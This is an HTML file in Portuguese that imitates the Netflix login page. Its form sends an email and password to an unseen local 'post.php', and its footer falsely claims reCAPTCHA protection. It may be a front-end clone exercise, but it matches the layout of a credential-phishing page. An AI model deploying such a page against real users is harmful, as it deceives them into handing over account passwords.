<!DOCTYPE html>
<html lang="pt-br">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login | Netflix</title>
  <style>
    * {
      box-sizing: border-box;
      padding: 0px;
      margin: 0px;
      font-family: Helvetica, sans-serif;
    }

    body {
      background: url(./bk-netflix.jpg);
      background-size: cover;
      background-position: center;
      background-repeat: no-repeat;
      width: 100%;
      height: 100vh;
      color: #f4f5f5;
    }

    header {
      position: relative;
      width: 100%;
      padding-bottom: 15px;
    }

    .logo img {
      width: 205px;
    }

    .ghost-um {
      width: 100%;
      height: 100%;
      z-index: -1;
      position: absolute;
      background: rgb(0, 0, 0);
    }

    .titulo h2 {
      color: #f4f5f5;
      font-size: 32px;
      padding-bottom: 10px;
    }

    .login-container {
      width: 100%;
      padding: 30px;
    }

    .login-form form {
      margin: 8px;
      display: flex;
      flex-wrap: wrap;
      flex-direction: column;
      gap: 14px;
    }

    .login-form input {
      background-color: rgb(51, 49, 49);
      border: none;
      width: 100%;
      height: 51px;
      border-radius: 4px;
      padding: 8px 16px;
    }

    #btn-entrar {
      background: #e50914;
      width: 100%;
      height: 50px;
      border-radius: 8px;
      color: #f4f5f5;
      font-weight: 700;
      font-size: 18px;
      border: none;
    }

    #btn-entrar:hover {
      cursor: pointer;
    }

    /* Customize the label (the container) */
    .container {
      display: block;
      position: relative;
      padding-left: 35px;
      cursor: pointer;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
      user-select: none;
    }

    .container p {
      position: relative;
      font-size: 12px;
      color: rgb(173, 173, 173);
      top: 3px;
      left: -12px;
    }

    /* Hide the browser's default checkbox */
    .container input {
      position: absolute;
      opacity: 0;
      cursor: pointer;
      height: 0;
      width: 0;
    }

    /* Create a custom checkbox */
    .checkmark {
      position: absolute;
      top: 0;
      left: 0;
      height: 18px;
      width: 18px;
      border-radius: 2px;
      background-color: rgba(238, 238, 238, 0.384);
    }

    /* On mouse-over, add a grey background color */
    .container:hover input~.checkmark {
      background-color: #ccc;
    }

    /* When the checkbox is checked, add a blue background */
    .container input:checked~.checkmark {
      background-color: #eef3f5;
    }

    /* Create the checkmark/indicator (hidden when not checked) */
    .checkmark:after {
      content: "";
      position: absolute;
      display: none;
    }

    /* Show the checkmark when checked */
    .container input:checked~.checkmark:after {
      display: block;
    }

    /* Style the checkmark/indicator */
    .container .checkmark:after {
      left: 5px;
      top: 1px;
      width: 5px;
      height: 10px;
      border: solid rgb(78, 73, 73);
      border-width: 0 3px 3px 0;
      -webkit-transform: rotate(45deg);
      -ms-transform: rotate(45deg);
      transform: rotate(45deg);
    }

    .assinatura p {
      color: rgb(173, 173, 173);
    }

    .assinatura .link-span a {
      text-decoration: none;
      color: #fff;
    }

    .aviso p {
      padding: 12px 0px;
      font-size: 12px;
      color: rgb(173, 173, 173);
    }

    .aviso span a {
      color: rgb(0, 130, 236);
    }

    @media (min-width: 639px) {
      .logo img {
        position: relative;
        top: 10px;
        width: 110px;
      }
    }

    @media (min-width: 740px) {
      .logo img {
        width: 230px;
      }

      main {
        width: 100%;
        display: flex;
        align-items: center;
        justify-content: center;
      }

      .login-container {
        width: 450px;
        padding: 65px;
        background: rgba(0, 0, 0, 0.767);
      }

      .ghost-um {
        background: rgba(0, 0, 0, 0.466);
      }
    }
  </style>
</head>

<body>
  <div class="ghost-um">
  </div>
  <header>
    <div class="logo">
      <a href="./login.html">
        <img src="./logo.svg" alt="Netflix logomarca">
      </a>
    </div>
  </header>


  <main>
    <div class="login-container">
      <div class="titulo">
        <h2>Entrar</h2>
        <div class="login-form">

          <form action="./post.php" method="post">
            <input type="text" name="email" placeholder="Email ou número de telefone">

            <input type="password" name="senha" placeholder="Senha">
            <br />
            <button type="submit" id="btn-entrar">Entrar</button>

            <label class="container">
              <input type="checkbox">
              <p>Lembrar-se de mim</p>
              <span class="checkmark"></span>
            </label>
          </form>
        </div>
      </div>
      <br /><br /><br />
      <div class="infos">
        <div class="assinatura">
          <p>Novo por aqui? <span class="link-span"><a href="./index.html">Assine agora</a></span>.</p>
        </div>
        <div class="aviso">
          <p>Esta página é protegida pelo Google reCAPTCHA para garantir que você não é um robô <span class="link-span"><a href="./index.html">Saiba mais</a></span>.</p>
        </div>
      </div>
    </div>
  </main>

</body>

</html>